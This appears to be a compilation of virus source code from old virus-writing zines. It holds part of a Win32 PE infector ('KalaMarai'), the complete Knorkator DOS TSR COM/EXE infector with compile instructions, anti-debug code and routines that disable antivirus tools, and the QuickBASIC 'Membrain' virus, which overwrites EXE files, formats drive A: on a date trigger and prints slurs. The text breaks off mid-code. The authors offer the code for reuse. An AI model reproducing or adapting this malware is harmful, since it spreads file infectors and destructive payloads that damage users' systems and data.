push eax push ebx call dwo [SetFilePointer] ;ajusta ponteiro inc eax jz erro push 0 push ofs temp push dwo [esp+(8*4)+4+(2*4)] push dwo [esp+(8*4)+12+(3*4)] push ebx call dwo [ReadFile] ;le valor test eax, eax jz erro jmp pula_stc alinha_file: push ecx mov ecx, [ebp.NT_OptionalHeader.OH_FileAlignment] jmp alinha alinha_mem: push ecx mov ecx, [ebp.NT_OptionalHeader.OH_SectionAlignment] alinha: dec ecx add eax, ecx not ecx and eax, ecx pop ecx ret verifica: pushad sub esp, IMAGE_SIZEOF_DOS_HEADER mov ebp, esp sub esi, esi mov dwo [esp+IMAGE_SIZEOF_DOS_HEADER.Pushad_eax], -1 ;sinaliza erro push esi push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push esi push esi push GENERIC_READ+GENERIC_WRITE push dwo [esp+(8*4)+(6*4)+4+IMAGE_SIZEOF_DOS_HEADER] call dwo [CreateFileA] mov ebx, eax inc eax jz nao_deu push ebx ;par metro para CloseHandle push esi push ofs temp

push IMAGE_SIZEOF_DOS_HEADER push ebp push ebx call dwo [ReadFile] test eax, eax jz fecha_arquivo xor dwo [temp], IMAGE_SIZEOF_DOS_HEADER jnz fecha_arquivo xor wo [ebp], IMAGE_DOS_SIGNATURE jnz fecha_arquivo ; um arquivo EXE? mov eax, [ebp.MZ_lfanew] mov [pe_ptr], eax add eax, -4 push esi push esi push eax push ebx ;vai at PE header-4 call dwo [SetFilePointer] inc eax jz fecha_arquivo push esi push ofs temp push 4 ;l 1 dword push ebp push ebx call dwo [ReadFile] test eax, eax jz fecha_arquivo xor dwo [temp], 4 jnz fecha_arquivo xor dwo [ebp], 12345678h org $-4 marca dd -1 jz fecha_arquivo mov dwo [esp+IMAGE_SIZEOF_DOS_HEADER.Pushad_eax+4], 0 ;sinaliza no infectado pop dwo [esp+IMAGE_SIZEOF_DOS_HEADER.Pushad_ebx] ;salva e remove handle jmp nao_deu fecha_arquivo: call dwo [CloseHandle] nao_deu: sub esp, -IMAGE_SIZEOF_DOS_HEADER popad ret 4 reloctable kernel32 dw RELOCS dup ("Re") db "KERNEL32.DLL", 0

kernel32API db "CreateThread", 0 db "CreateFileA", 0 db "CloseHandle", 0

db "VirtualAlloc", 0 db "SetThreadPriority", 0 db "ResumeThread", 0 db "ReadFile", 0 db "SetFilePointer", 0 db "GetFileTime", 0 db "SetFileTime", 0 db "GetFileAttributesA", 0 db "SetFileAttributesA", 0 db "WriteFile", 0 db "SetEndOfFile", 0 db "VirtualFree", 0 db "GetTickCount", 0 db "GetDriveTypeA", 0 db "SetCurrentDirectoryA", 0 db "FindFirstFileA", 0 db "FindNextFileA", 0 db "FindClose", 0 db "lstrlen", 0 db "Sleep", 0 db "DeleteFileA", 0 db "SuspendThread", 0 db 0 ;org 01D2Ah crc32 dd "CRC-" final_virus equ $ temp dd ? pe_ptr dd ? tsecao dd ? lugarloader dd ? escreve dd ? tamanho_total dd ? rnd dd ? thread_id dd ? thread_corrige dd ? tabela dd ? espera dd ? infectou? dd ? CreateThread_ dd ? CreateFileA dd ? CloseHandle dd ? VirtualAlloc dd ? SetThreadPriority dd ? ResumeThread dd ? ReadFile dd ? SetFilePointer dd ? GetFileTime dd ?

;alinhado num multiplo de 249

SetFileTime dd ? GetFileAttributesA dd ? SetFileAttributesA dd ? WriteFile dd ? SetEndOfFile dd ? VirtualFree dd ? GetTickCount dd ? GetDriveTypeA dd ? SetCurrentDirectoryA dd ? FindFirstFileA dd ? FindNextFileA dd ? FindClose dd ? lstrlen dd ? Sleep2 dd ? DeleteFileA dd ? SuspendThread dd ? align 4 v_fim equ this byte ;final do codigo viral

_GMHA dd 0 _GPA dd 0 tempo dd 0 .code

;variaveis usadas pelo stub

start: push 4 ;stub do virus @pushsz "Virus KalaMarai" @pushsz "Deseja continuar?" push 0 extrn MessageBoxA:PROC call MessageBoxA cmp al, 6 ;confirma execu o do virus je vaila saifora: push 0 extrn ExitProcess:PROC call ExitProcess ;ihhh... usu rio amarelou! vaila: extrn GetModuleHandleA:PROC mov eax, ofs GetModuleHandleA mov [_GMHA], eax ;salva ponteiros para APIs essenciais mov eax, ofs _GMHA mov [GMHA], eax extrn GetProcAddress:PROC mov eax, ofs GetProcAddress mov [_GPA], eax mov eax, ofs _GPA

mov [GPA], eax BASE=00400000h mov ebp, BASE ;ebp=imagebase mov esi, [ebp.MZ_lfanew] add esi, ebp ;esi=pe header mov ecx, [esi.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_Size] mov esi, [esi.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_VirtualAddress] add esi, ebp ;esi=reloca es lea edx, [esi+ecx] ;edx=limite mov edi, ofs reloctable reloca: cmp dwo [esi], ofs v_ini-BASE ;bloco aponta para o virus? jnb aponta add esi, [esi+4] ;no, pega proximo bloco cmp esi, edx jb reloca ;ainda existem reloca es? push (ofs v_fim-ofs v_ini) push 40h extrn GlobalAlloc:PROC call GlobalAlloc ;aloca alguma memoria mov ebp, eax mov edi, eax mov esi, ofs v_ini mov ecx, (ofs v_fim-ofs v_ini) ;copia virus(pra testar relocs) rep movsb push ecx ;ecx=zero push esp ;*ThreadID push ecx push ecx add ebp, ofs entrada-ofs v_ini push ebp ;ebp=inicio do virus push ecx push ecx extrn CreateThread:PROC call CreateThread ;executa virus pop eax pergunta: push 4 @pushsz "Virus KalaMarai" @pushsz "Terminar processo?" push 0 extrn MessageBoxA:PROC call MessageBoxA cmp al, 6 ;termina processo de infe o? je saifora add [tempo], 5*60*1000 ;5,10,15... push dwo [tempo] extrn Sleep:PROC call Sleep ;espera 5+ minuto jmp pergunta ;pergunta de novo... aponta:

push edx ;reloca o aponta para o virus mov edx, [esi] sub edx, 2000h ;base das reloca es lodsd lodsd xchg ecx, eax sub ecx, 8 shr ecx, 1 ;ecx=numero de reloca es sub eax, eax proxima: lodsw test eax, eax ;reloca o nula? jz nula and ax, 0000111111111111b ;limpa TIPO add eax, edx not ax stosw ;armazena deslocamento da anterior inc dwo [numeroreloc] nula: loop proxima pop edx jmp reloca ;bloco processado... end start

; [VirusName] : Knorkator ; [VirusAutor]: Acid Bytes ; [Type] : TSR COM/EXE/BIN/OVL/OVR infector ; [Date] : 09/10/99 ; [Special F.]: Some retro/anti-debug technics, safety checks and error handling. It infects on: ; execute, open, ext. open, delete, attrib, rename, create and close !!! ; [Based on] : The virus code is based on no-frills code, using direct manipulation ; of the MCB chain. ; [Size] : 1000 bytes ; [Info] : This is just a funny virus, with funny payload and so on, nothing really ; groundbreaking or new. The code is commented, so newbies may learn from it. ; Feel free to use some of the code in your own virus if you like to. ; [Detection] : -AVPv3.0 (build129)-->suspicous,type:ComTsr ; -AVGv6.0 --->detected as infected/not specific ; -Norton Antivirus v5.00.01 --->no detection ; -IKARUS virusUTILITIES v3.13a --->no detection ; -Thunderbyte AntiVirus v8.07pro --->detected as Burma.1 virus ; --->flags: c,F,L,M,Z,O,B,X,t (guess thats all a virus can have,hehe) ; U see, like said it's a fun-virus, which is not prepared to survive in the wild. ; [Contact] : acidbytes@gmx.net -> IRC: Undernet/#vir/#virus

; ____________________________________________________________________________________________ ; [Compile] : TASM /m knork.asm ; : TLINK /t knork.obj ; ____________________________________________________________________________________________ .286 .model tiny .code JUMPS org 100h ;use .286 instructions ;like it says ;this code is for TASM only ;100h is where to .com file starts

virusstart: jmp real_begin

;Virus jumps to the real beginning of code

Anti_Debug: in al,20 ;get IRQ status... or al,2 ;Disable IRQ 1 (keyboard) out 20,al ;--->KEYBOARD SUCCESSFULLY LOCKED! int 3 ;stops the debugger on each loop int 3 ;when the debugger ;stops here, the keyboard will be disabled, ;so the user can't do anything! ;thanx to Sepultura for this one... loop Anti_Debug

mov cx,0ffffh fprot_loop: jmp back mov ax,4c00h int 21h int 20h back: loop fprot_loop real_begin: set_some_equals: vsize equ psize equ EXE_dsp equ fname equ handle equ start: anti_vsafe: mov ax,0fa01h mov dx,5945h int 16h

;Thanx goes out to Septic for ;this piece of code ;It should fool F-prot ;and some debuggers if trying ;to trace through the ;Code

;set some equals like "variables" buffer-start (handle-start+2)/10h+1 EXE_dispatch-COM_dispatch buffer+1ah fname+1dh

;removes resident VSAFE from memory ;i know that nobody's using VSAFE anymore,but ;i just like that small anti-ms routine

DisableNAVTSR: mov ax,0FE02H mov si,4E41H mov di,4E55H int 2FH

;this disables Norton AntiVirus 4.0 "NAVTSR" resident driver. ;-> this was taken from VLAD#6, thanks to "Mouth of Sauron"

;--------------------------------------------------------------------------------------------; The payload (display a message, creating directories) will only activate on ; friday the 21st...The next routine checks the date ;--------------------------------------------------------------------------------------------PayloadLoadChecker: mov ah,2ah ;Get system date function int 21h ;do! cmp al,5h ;compare...if it's friday jne startvir ;if not so jump to startvir mov ah,2ah ;get date int 21h ;do! cmp dl,15h ;see if it's the 21st (21 is 15 in hex) jne startvir ;jump to startvir if not equal payload: mov ah,9h lea dx, message int 21h ;this is the payload, it shows the Knorkator-Message on the ;screen...and creates 3 subdirs on the HD

mov ah,39h ;create new directory function lea dx, dirname1 ;cx=name of directory --> "STUMPEN!" int 21h ;do! mov ah,39h lea dx, dirname2 ;creates "ALFATOR!" int 21h mov ah,39h lea dx, dirname3 ;creates "BUZZDEE!" int 21h ;------------------------------------------------------------------------------------; Here does the payload end, and the virus begins ;------------------------------------------------------------------------------------startvir: pusha push ds push es push cs push cs pop ds pop es

;save registers

;set cs=ds=es-->so they are equal filled

res_check: mov ax,3030h ;is the virus already resident? int 21h ;do!

cmp ax,303h ;compares ax to 303h jne install ;if not equal->go resident cmp bx,ax jnz install ;no? jmp short dispatch ;yeah, let the proggie go

install: mov ah,52h ;SYSVARS-> get list! int 21h ;do! mov ax,es:[bx-2] ;gets the segment of the first MCB xor si,si ;empty SI(set zero) find_mem: ;trace through the MCB chain mov ds,ax cmp byte ptr [si],'Z' ;last block is marked with Z je found_MCB ;if found last block of MCB goto found_MCB! mov bx,ax ;if not found->save the segment of the previous one add ax,[si+3] ;off to the next one INC AX jmp short find_mem ;run the routine again to find memory found_MCB: cmp word ptr [si+3h],psize ;compare the ammount of found memory to virus size jae fix_block ;if size is equal or more goto fix_block mov ds,bx ;if not-> use the previous one xchg ax,bx ;set ax=bx fix_block: sub word ptr [si+3],psize ;substract the virus size from memory block add ax,word ptr [si+3] ;find its end(add the memory size to ax) inc ax mov word ptr [si+12h],ax ;feed new value to the owner's PSP mov es,ax push cs pop ds mov di,100h mov si,offset start mov cx,vsize rep movsb ;copy the virus push es mov ax,offset get_int21h push ax retf

get_int21h: mov ax,3521h int 21h push cs pop ds

;get the adress of int 21h! ;do it!

mov word ptr [old_21h],bx ;save the old int21 in bx mov word ptr [old_21h+2],es ;save old int21+2 bytes in es mov ax,2521h ;set the new int 21h-function mov dx,offset int21h_handler ;put the int21h-handler in dx int 21h ;do! dispatch: jump db dest dw

0e9h ;determines how the file is beeing dispatched 0 ;this structure is also used in COM infection

autor_and_name db '[Knorkator]',0 db '(c) 1999 Acid Bytes',0 COM_dispatch: pop es pop ds popa mov si,offset csip ;where the old code is saved mov di,100h push di movsw ;restore first 3 bytes movsb pop di xor si,si jmp di ;go there EXE_dispatch: mov si,offset sssp cli lodsw mov ss,ax ;restore stack lodsw mov sp,ax sti pop es pop ds popa db 0eah ;jmp far to the csip address csip dd 0 sssp dd 0 int21h_handler: cmp ax,3030h ;compares ax to 3030h(if equal) je install_check ;if equal (means NOT resident) -->jump to installation check cmp ah,3ch ;if ah=3ch(create file f.) then je create ;jump to "create" cmp ah,3dh ;if ah=3dh(open file function) then je open ;jump to "open" cmp ah,3eh ;if ah=3eh(close file function) then je close ;jump to "CLOSE" cmp ah,41h ;if "UNLINK"-function

je cmp je cmp je cmp je cmp je

open ah,4bh open ah,43h open ah,56h open ax,6c00h extopen

;jump to "open" ;if "EXECUTE"-function ;jump to "open" ;if "CHMOD" ;jump to "open" ;if "RENAME" ;jump to open ;if extended open/create THEN ;jump to EXTENDED OPEN

return_21h: db 0eah old_21h dd 0

;jmp far to the old int 21h vector

install_check: mov ax,303h mov bx,ax _iret: iret ;useful iret opcode create: mov si,dx call save_name ;call the save the file's name-routine call int21h ;call int21h-handler mov word ptr cs:[handle],ax ;save its handle in ax iret ;return close: push bx ;save handle call int21h ;call int21h-handler push cs pop ds mov dx,offset fname ;set ds:dx to file's name/put filename in dx pop ax cmp ax,word ptr cs:[handle] ;same handle as the one we saved? je ext_entry ;if the same --> continue iret ;else, get outta here extopen: push push mov jmp pusha ds es dx,si ;moves the dx-value(filename) to si short letsgo ;jump to letsgo

ext_entry: mov ah,30h ;DOS version check ;this is needed because closed files aren't specially ;handled, they use the same routines open: pusha

push ds push es letsgo: push cs pop ds push cs pop es mov cx,6 cld call save_name ;call the save_name-routine(save the name for later use) mov dx,di mov si,di lodsw ;get first two chars of filename and ax,0dfdfh ;capitalise them k_check: scasw ;check if they match those of bad files je fn_return ;if found "good one" jump to fn_return loop k_check ;loops the k_check until finding a good one k_zero: lodsb ;find the zero in the ascii string or al,al jnz k_zero ;jump to k_zero if not zero sub si,4 ;substract 4 from si-value mov cx,5 ;move 5 do cx mov di,offset exts ;check if the extensions match with those lodsw ;we can infect and ax,0dfdfh ext_check: scasw je ext_verify ;if they match then jump to ext_verify inc di loop ext_check ;loop ext_check until match jmp short fn_return ;jump to fn_return ext_verify: lodsb and al,0dfh scasb je fn_return jmp short set24h_handler close_file: mov ah,3eh ;close file function call int21h ;call int21h-handler pop ax ;reset attributes pop cx mov dx,offset fname ;put fname in dx

call int21h reset_int24h: pop ax pop dx pop ds call int21h fn_return: pop pop popa jmp

;call int21h-handler

;call int21h-handler(resets int 24h)

es ds

;restore all registers

return_21h

;jumps to return_21h (proceed with the original call)

set24h_handler: mov ax,3524h ;point int 24h to an iret opcode call int21h ;call int21h-handler push es push bx mov ax,2524h push ax mov dx,offset _iret call int21h ;call int21h-handler push cs pop ds push cs pop ds open_file: mov dx,offset fname ;put fname in dx mov ax,4300h call int21h ;do! push cx ;save attributes mov ax,4301h xor cx,cx ;clear attributes (no attributes) push ax call int21h ;do! mov ax,3d02h ;open file read/write function call int21h ;do! mov di,offset handle ;save file handle in di stosw xchg ax,bx ;move handle from ax into bx process_file: mov ax,5700h call int21h ;call int21h-handler push cx push dx mov cx,ax ;check for previous infection (time stamp) shr ax,6 or al,00011111b ;is seconds/2 = minutes/2?

or cl,00011111b cmp al,cl je bomb_out ;if already infected, jump to bomb_out mov ah,3fh ;if not-->read in 1ah bytes (EXE header) mov cx,1ah mov dx,offset buffer ;put virus size in dx mov si,dx call int21h ;call int21h-handler lodsw xchg ax,bp call lseek_EOF cmp bp,'MZ' ;true MZ EXE-check je EXE_file ;if yes, jump to EXE_file cmp bp,'ZM' ;sometimes the signature is "ZM" then je EXE_file ;jump to EXE_file too COM_file: ;else, assume it's a COM file or dx,dx jnz bomb_out ;we can't infect .com files over 64k sub ax,3 ;substract 3 from the file size mov di,offset dest stosw ;write it into a jmp near instruction dec si dec si mov di,offset csip ;save the original code movsw movsb call lseek_BOF mov ah,40h mov cx,3 mov dx,offset jump call int21h ;call int21h-handler (write the jmp near) xor ax,ax ;set ax,ax(set ax=0)(dispatched as COM) stosw jmp write_end ;jump to write_end(routine writes virus to file-end) bomb_out: pop dx ;restore registers pop cx ;and jmp close_file ;jump to close_file EXE_file: push dx push ax push dx push ax lodsw ;get part_pag xchg bp,ax lodsw ;get pag_cnt mov cx,200h mul cx

add pop pop cmp jb cmp jb

ax,bp cx ;save registers bp ax,cx ;is declared size the real physical size? bomb_out ;get out of here, if size is below dx,bp ;----> bomb_out ;---->same here

save_old_shit: ;save old cs:ip and ss:sp mov di,offset buffer ;moves the virussize to di cmp word ptr [di+18h],40h jae bomb_out ;get out here if above or equal push di ;save di mov si,offset buffer+0eh mov di,offset sssp movsw ;old ss movsw ;old sp lodsw mov di,offset csip movsw ;old ip movsw ;old cs fix_csip: pop di pop ax ;calculate new cs:ip pop dx mov cl,0ch shl dx,cl push ax mov cl,4 shr ax,cl add dx,ax shl ax,cl pop cx sub cx,ax mov word ptr [di+14],cx ;ip mov word ptr [di+16],dx ;cs fix_sssp: mov mov mov ;set new ss:sp word ptr [di+0eh],dx ax,0fffeh word ptr [di+10h],ax

fix_pages: ;do pag cnt and part pag pop ax ;reload virus size into dx:ax pop dx ;restore dx add ax,vsize ;adds virussize to ax adc dx,0 mov cx,200h div cx or dx,dx

jz no_inc inc ax no_inc: mov mov ;adjust the page data word ptr [di+2],dx ;part pag word ptr [di+4],ax ;pag cnt

all_done: mov ax,EXE_dsp mov di,offset dest stosw call lseek_BOF mov ax,40h mov cx,1ah mov dx,offset buffer call int21h ;write the new header,do it! write_end: ;write the body to the end call lseek_EOF ;call "seek to end of file" mov ah,40h mov cx,vsize mov dx,offset start call int21h pop dx pop cx mov cx,ax shr ax,6 and al,00011111b ;set our marker (time stamp) and cl,11100000b or cl,al ;seconds/2 = minutes/2 mov ax,5701 call int21h jmp close_file ;all done

int21h: ;do an int 21h call pushf call dword ptr cs:[old_21h] ret lseek_BOF: ;lseek to beginning of file xor al,al jmp short lseek lseek_EOF: mov al,02h lseek: mov ah,42h xor cx,cx cwd ;lseek to the end of file

;just lseek ;equalize cx (set cx=0)

call int21h ret

;calls int21h handler

save_name: mov di,offset fname ;saves the file name in di mov cx,0dh ;source = ds:si, destination = es:di rep movsb ret names db 'SCCLVSVINATBF',0dh ;files, which we don't want to infect exts db 'COMEXEBINOVLOVR' ;files we want to infect!

message db 'We have been in Flechtingen/Germany on 05/21/99.' db ' Knorkator rules!' db ' Cmon, its ' db 'friday the 21st-take some friends together and njoy life...' db 0Dh, 0Ah, '$' dirname1 db 'STUMPEN!',0 dirname2 db 'ALFATOR!',0 dirname3 db 'BUZZDEE!',0

buffer: end virusstart

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$-=phr0q's programming fundz presents=-$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ -=[X<THE>X]=---------------------------------------------------__ __ __ __ __ ______________ __ __ __ / \ / \ / \____/ \ \ / \ \ _ \ /\ / \| \ | | \ \_/ / \ ______/ \_/ / |\ /|_) // ,\ \ /| \| | | |\_/| | | __) `| |\_/| | |/ < _ </ _ \| || |\\ | | | | | | |______.| | | | |\ \ | \ \ / \ \ || | \ | / \ / \ / ____ \ \ / \ |/ / \ / \\ / \ \/ \ / \ \___/ \___/ \__/ \__/___/ \___/____/__/ \__// \__/_/\__/ \__/ "'spect tha throbbin pulse" --------------------------------------------------=[X<VIRUS>X]=$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$by phr0q (a.k.a Krimson Kaper (HEH)) $$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ -=[INTRO]=-

Welcome to the first virus ever for Qbasic (QuickBASIC 4.5 actually) made by phr0q that aCtually WORKS! The often hyped basvir virus that some fool from the 80's made doesnt work sorry to say because i looked at it and it aint fool proof. i present to you The Membrain virus. HEH. -=[SHOUTS]=SHouts goes out to nugz, my MAIN man. . ehhe. Evasion and like... mike w. and mel and... other people in #QuickBasic for the help even though they hate virii and the people in #virus for some ideas which had nothing to do with this. And... umm.. thats it.. HEH.

-=[ABOUT]=You know that i like finished this virus a long as time ago like about last year and i was to lazy to spread it since it was one of my first working virii. i guess.. um. this was coded in Quick BASIC because everyone believes that BASIC is limited and NOTHING can be done with it. I come to prove you wrong! HEh. If you want to read some of my old excerpts and stuff feel free to visit http://members.tripod.com/phr0q/text and i will have some viral related stuff. Also check out phr0q.com and the /virii section when i do get stuff done. ANY ways to get to the point i was so interested in virii back in the day. i just wanted to say Douglas Adams aka psykosis or some shit, you are gay and i made a virus with Qb when you said u could but couldnt. On a non personal note i present you with the final build for the membrain virus. ------------Membrain.bas ---[Cut here] DECLARE FUNCTION CurrentDirectory$ () DECLARE SUB DELAY (howlong!) DECLARE SUB Payload () DECLARE FUNCTION NAME$ () DECLARE FUNCTION CRYPT$ (CODE$) DECLARE FUNCTION DECRYPT$ (CODE$) DIM byte(1 TO 12000) DIM Buffer AS LONG COMMON SHARED f$, ext$, FERROR, BAX$, CODE$, A$ BAX$ = "^b^" Payload MAIN: CLOSE SHELL "IF EXIST DEL TEMP.tmp" SHELL "DIR " + " " + DECRYPT$("43") + " > TEMP.tmp" OPEN "TEMP.tmp" FOR INPUT AS #1 FOR A = 1 TO 5 LINE INPUT #1, A$

NEXT LINE INPUT #1, A$ FIN1: LINE INPUT #1, A$ FIN2: GETNEXT: Z=Z+1 f$ = "": A$ = "": B$ = "": A = 0 LINE INPUT #1, A$ IF LEFT$(A$, 1) = " " THEN GOTO FIN0 FOR A = 1 TO LEN(A$) B$ = MID$(A$, A, 1) IF B$ = " " THEN GOTO FIN3 f$ = f$ + B$ NEXT FIN3: V = LEN(f$) c=A-V f$ = "" IF A$ = "" THEN GOTO FIN0 FOR A = c TO LEN(A$) B$ = MID$(A$, A, 1) f$ = f$ + B$ IF B$ = " " THEN GOTO FIN4 NEXT FIN4: f$ = MID$(f$, 1, LEN(f$) - 1) ext$ = MID$(A$, 10, 3) IF UCASE$(ext$) <> "EXE" THEN GOTO NARXT IF f$ = "" OR INSTR(f$, " ") THEN GOTO FIN0 CONT: IF f$ = "TEMP" THEN IF ext$ = "TMP" THEN GOTO NARXT CLOSE #2, #3, #9, #4 OPEN f$ + "." + ext$ FOR INPUT AS #9 IF LOF(9) = 0 THEN CLOSE #9: GOTO NARXT LINE INPUT #9, FULL$ CLOSE #9 IF INSTR(FULL$, "MEMBRAIN") OR INSTR(FULL$, "MBRAIN") THEN FULL$ = "": GOTO NARXT FULL$ = "" CLOSE #13 OPEN f$ + "." + ext$ FOR INPUT AS #13 IF LOF(13) = 0 THEN CLOSE #13: GOTO NARXT IF LOF(13) < 20 THEN CLOSE #13: GOTO NARXT LINE INPUT #13, EHX$ IF MID$(EHX$, 1, 2) <> "MZ" THEN CLOSE #13: GOTO NARXT CLOSE #13 SHELL "ATTRIB " + f$ + "." + ext$ + " > TEMPO.TMP" OPEN "TEMPO.TMP" FOR INPUT AS #7 LINE INPUT #7, ATR$ CLOSE #7

KILL "TEMPO.TMP" ATRR$ = MID$(ATR$, 1, 10) IF INSTR(ATRR$, "A") THEN ATTRIBUTE$ = ATTRIBUTE$ + " +A" IF INSTR(ATRR$, "S") THEN ATTRIBUTE$ = ATTRIBUTE$ + " +S" IF INSTR(ATRR$, "R") THEN ATTRIBUTE$ = ATTRIBUTE$ + " +R" IF INSTR(ATRR$, "H") THEN ATTRIBUTE$ = ATTRIBUTE$ + " +H" KILL f$ + "." + ext$ CLOSE #2, #3 OPEN NAME$ FOR BINARY AS #2 OPEN f$ + "." + ext$ FOR BINARY AS #3 DO Buffer = Buffer + 1 GET 2, , byte(Buffer) PUT 3, , byte(Buffer) LOOP UNTIL EOF(2) CLOSE #2: CLOSE #3 INFECTEDEXES = INFECTEDEXES + 1 IF ATTRIBUTE$ = "" THEN GOTO NARXT SHELL "ATTRIB " + ATTRIBUTE$ + " " + f$ + "." + ext$ ATTRIBUTE$ = "" NARXT: IF Z > 15 THEN GOTO EndOfLine IF INFECTEDEXES < 3 THEN GOTO GETNEXT ABORT: FIN0: IF INFECTEDEXES < 3 THEN SHELL "IF EXIST ATTRIB -H -R TEMP.TMP" RESET ON ERROR GOTO ConT2 KILL "TEMP.TMP" ConT2: SHELL "CD > CD.TMP" OPEN "CD.TMP" FOR INPUT AS #5 LINE INPUT #5, CURRDIR$ CLOSE #5 KILL "CD.TMP" FOR L = 1 TO LEN(CURRDIR$) L$ = MID$(CURRDIR$, L, 1) IF L$ = "\" THEN SLASH = SLASH + 1 NEXT IF SLASH = 1 THEN GOTO EndOfLine CHDIR ".." GOTO MAIN END IF GOTO EndOfLine PRINT "ThA MEmBRaIN ViRuS, CrEAtEd By br0k3n AkA Phr0ck Of wwS n eK" PRINT "1sT ViRii MadE wIt QuickBasic 4.5 UsINg MaH DirD0s EnGINe2" PRINT "GrEEtSZ: chron1c, #got-root, (icesk you faggit lamuR i oWn" PRINT "j00 n0w N fOR EVaH!!), BladedApple (Phlubber), 40HEX, SLAM," PRINT "29A, XINE, HEXFILES, An All DaH nIgG4z OuT tHeRe! hEh!" PRINT "FUCK THE MELISSA VIrUOs, tHAt sHyTe WaS tayMEd An lAyMe!"

PRINT "mOrE vIrII cOmmING 2 yA Fr0M phr0ck (kRIMSON kAPER)" EndOfLine: SHELL "IF EXIST ATTRIB -H -R TEMP.TMP" RESET ON ERROR GOTO SHNAT KILL "TEMP.TMP" SHNAT: END FUNCTION CRYPT$ (CODE$) CODE = ASC(CODE$) '+ ASC(RIGHT$(CODE$, 1)) + LEN(CODE$) FOR A = 1 TO LEN(A$) B$ = MID$(A$, A, 1) B = ASC(B$) B = B + CODE IF B > 255 THEN B = 255 - CODE IF B < 1 THEN B = 255 - CODE BAX$ = BAX$ + CHR$(B) NEXT A CRYPT$ = BAX$ END FUNCTION FUNCTION CurrentDirectory$ SHELL "CD >CD.TXT" f% = FREEFILE OPEN "I", f%, "CD.TXT" LINE INPUT #f%, CD$ CLOSE f% KILL "CD.TXT" CurrentDirectory$ = CD$ END FUNCTION FUNCTION DECRYPT$ (CODE$) DECRYPT$ = A$ FOR A = 1 TO LEN(BAX$) B$ = MID$(BAX$, A, 1) B = ASC(B$) B = B - CODE IF B > 255 THEN B = 255 - CODE IF B < 1 THEN B = 255 - CODE A$ = A$ + CHR$(B) NEXT A END FUNCTION SUB DELAY (howlong!) N! = TIMER DO: LOOP WHILE TIMER - N! < howlong! END SUB FUNCTION NAME$ DIM MCODE(1 TO 7) AS INTEGER, OS AS INTEGER, BX AS INTEGER, DUMMY AS LONG

DEF SEG = VARSEG(MCODE(1)) OS = VARPTR(MCODE(1)) POKE OS, &H55'PUSH BP POKE OS + 1, &H89: POKE OS + 2, &HE5'MOV BP,SP POKE OS + 3, &HB4: POKE OS + 4, &H62'MOV AH,62 POKE OS + 5, &HCD: POKE OS + 6, &H21'INT 21 POKE OS + 7, &H8B: POKE OS + 8, &H7E: POKE OS + 9, 6'MOV DI,[BP+6] POKE OS + 10, &H89: POKE OS + 11, &H1D'MOV [DI],BX POKE OS + 12, &H5D'POP BP POKE OS + 13, &HCB'RETF CALL ABSOLUTE(BX, OS) DEF SEG = BX ENVSM = PEEK(&H2C) + 256 * PEEK(&H2D) ENVOS = 0 DEF SEG = ENVSM DUMMY = 0& WHILE DUMMY <> 65536 DUMMY = PEEK(ENVOS) + 256& * (PEEK(ENVOS + 1) + 256& * (PEEK(ENVOS + 2) + 256& * PEEK(ENVOS + 3))) ENVOS = ENVOS + 1 WEND ENVOS = ENVOS + 3 N$ = "" A=1 WHILE A <> 0 A = PEEK(ENVOS) IF A <> 0 THEN N$ = N$ + CHR$(A) ENVOS = ENVOS + 1 WEND DEF SEG NAME$ = N$ END FUNCTION SUB Payload DEFSNG L RANDOMIZE TIMER XBRAIN1$ = "YOU ARE LUCKY, YOU MUST BE A FRIEND OF phr0q, MEMBRAIN" XBRAIN2$ = "WILL *NOT* INFECT YOU AS LONG AS YOU HAVE THIS FILE!:)" XBRAIN3$ = " -A friend of phr0q is a friend of mine!-" MSG691$ = "HELLO, MY NAME IS MemBrain, I AM NOW A PART OF YOUR WHITE ASS!" MSG692$ = "Whats a matter, mixed up? Thats the effects of drugs on your brain man!" MSG693$ = " ReSpEkt ThA ThrobBin PuLsE!" CLOSE OPEN "C:\XBRAIN.MEM" FOR BINARY AS #6 CLOSE #6 OPEN "C:\XBRAIN.MEM" FOR INPUT AS #6 IF LOF(6) < LEN("INSANE IN THE MEMBRAIN INSANE IN THE BRAIN") THEN GOTO FIZZ LINE INPUT #6, FD$ CLOSE #1 IF INSTR(UCASE$(FD$), "INSANE IN THE MEMBRAIN INSANE IN THE BRAIN") THEN CLOSE

PRINT XBRAIN1$ PRINT XBRAIN2$ PRINT XBRAIN3$ SOUND 2600, 1 SOUND 500, 1 SOUND 3002, 2 KILL NAME$ END END IF FIZZ: CLOSE #6 DRIV$ = MID$(CurrentDirectory$, 1, 2) IF INSTR(DATE$, "4") THEN IF INSTR(DATE$, "2") THEN IF INSTR(DATE$, "0") THEN IF UCASE$(DRIV$) = "A:" THEN SHELL "FORMAT A: /AUTOTEST" END IF END IF END IF IF MID$(TIME$, 1, 5) = "06:09" THEN CLS COLOR 8 PRINT MSG691$ COLOR 15 PRINT MSG692$ COLOR 1 PRINT MSG693$ SHELL "SUBST A: " + CurrentDirectory$ SHELL "SUBST C: A:" COLOR 8 PRINT "HeHEHhEHeH SPeKT THa Masta Phr0Ck" END IF

IF MID$(TIME$, 1, 5) = "04:20" THEN CLS COLOR 12 PRINT "Hey, white boi, sometimes brains CAN get tumors TOO..!": COLOR 3 PRINT "Coming soon: The HIV >> AiDS-X Virus:) by phr0ck aka br0k3n" DELAY 2 OPEN CHR$(255) + CHR$(255) + "CANCER.___" FOR APPEND AS #6 CLOSE #6 KILL CHR$(255) + CHR$(255) + "CANCER.___" OPEN CHR$(255) + CHR$(255) + "CANCER.___" FOR APPEND AS #6 FOR I = 1 TO 5000 IF INT(I / 500) = I / 500 THEN PRINT "."; FOR J = 1 TO 2 c$ = c$ + CHR$(J)

